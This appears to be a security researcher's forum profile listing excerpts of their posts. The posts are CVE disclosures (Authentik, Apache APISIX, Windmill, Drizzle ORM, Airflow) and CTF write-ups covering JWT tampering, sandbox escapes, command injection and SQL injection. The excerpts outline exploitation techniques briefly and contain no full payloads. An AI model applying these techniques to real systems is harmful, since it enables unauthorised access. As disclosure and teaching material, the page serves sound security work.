Recent content by 0x90
-
[CVE-2026-40172] Authentik Privilege Escalation via User PATCH
Privilege Escalation via User PATCH: Superuser Group Assignment Bypasses enable_group_superuser Summary PATCH /api/v3/core/users/{pk}/ allows a caller with change_user on a target user to assign arbitrary groups through UserSerializer, including groups with is_superuser=True, without requiring... -
[PlfanzenCTF] [MISC] pdfjail
The escape was short because Python helpfully attached the dangerous object to the exception. The jail read one ASCII line under 120 bytes and executed it with ReportLab's rl_safe_exec. The useful primitive was str.format. Format strings can walk attributes in ways that bypass ReportLab's...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[PlfanzenCTF] [WEB] Gartenverein Tackenberg
Varnish, please tell us the flag! The profile description was rendered as Markdown and then marked safe. That meant I could put raw HTML/CSS into my profile, including a <style> block. The admin bot was the interesting part. When I reported my profile, the bot logged in as its own user and...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[PlfanzenCTF] [WEB] Unauthentische Rache
This was three HTTP calls because the consent step was missing twice. The exploit looked almost too small at the end, but the interesting part was figuring out why it was allowed at all. The challenge had three moving pieces. Authentik was the identity provider. The flag dispenser owned the...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[CVE-2026-39999] Apache APISIX jwt-auth: Turning a Public Key into an Auth Bypass
TL;DR I found a JWT algorithm confusion bug in Apache APISIX that let me bypass authentication without credentials. The trick was simple, ugly, and very real: APISIX trusted the server-side key selection, but trusted the attacker-controlled JWT header for the verification algorithm. I found a... -
The $5,000 Hytale Bounty
TL;DR: I reported this Hytale server bug less than a week after launch, then waited about a month for a response while their team got buried in incoming reports. The bug itself was a clean path traversal in the server file browser, and it ended with a $5,000 payout plus an invite to a private... -
[KalmarCTF] [REV] Oracle
TL;DR Oracle turned out to be a nice little reversing chain with just enough nonsense to stay fun. The core idea was simple once I found the real entrypoint: the binary decrypts a blob with the first 7 input bytes, jumps through a Heaven’s Gate transition into 64 bit code, then uses a polynomial...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[CVE-2026-33881] Windmill NativeTS Code Injection via Workspace Env Vars
TL;DR: This one was almost offensively simple. Windmill’s NativeTS executor dropped workspace environment variable values into single-quoted JavaScript without escaping a single quote, which meant a workspace admin could inject code into every NativeTS run in that workspace. The public advisory... -
Apache Airflow, SSTI, and the Annoying Question of What Counts as a Vulnerability
TL;DR: I reported what started as a pretty clean Jinja2 SSTI in Airflow, and it turned into a much more interesting argument about trust boundaries, product intent, and what a security model is actually supposed to mean. The exploit chain was real. The disagreement was about whether that chain... -
[CVE-2026-39356] Drizzle ORM Had a Real SQL Injection, and the Fix Was Refreshingly Boring
TL;DR: I found a SQL injection in Drizzle ORM that sat in the identifier escaping path, which is exactly where a lot of people would assume things are safe. The bug was simple, the impact was not, and the disclosure process was one of the smoother ones I have dealt with. Drizzle had a real SQL... -
[/MNT/AIN LIB] [WEB] agebarrier
This challenge isnt supposed to be easy LOL The amount of time i invested into figuring this out is disgusting... So basically there is a jwt age check... you can generate tokens with an endpoint. If your token is 18+ years old you can access the flag.. The whole trick was to set different...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] rtfm
Yea this one was a lil harder, cba to read documentation... const u = await prisma.user.findUnique({ where: { username: c.username, password: c.password, }, }); if (!u) { return new Response('UNAUTHORIZED', { status: 401 }); }...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] x-is-for-execution
Beginner friendly command injection. Only safeguard is a client sided html pattern, which prevents you from properly escaping the command literals. Soo We can just delete the pattern attribute (or send a request manually), escape the shown base command and print out the flag in...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [WEB] critical-integrity
Owww myy gaawwd, JWT trickery! The challenge is to not login as guest, but login as admin and visit /admin. There is a cookie set, which is a JWT We can basically just change the user, to admin and encode it again...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups
-
[/MNT/AIN LIB] [CRYPTO] confident-hashes
confident-hashes SRC: https://library.m0unt41n.ch/challenges/confident-hashes This challenge allows the "breaching" of the admin hash and the goal is too reverse the hash function too obtain the password. Under the hood, this custom hash operates on 32 nibbles (4‑bit words), repeatedly XOR’ing...- 0x90
- Thread
- Replies: 0
- Forum: CTF Writeups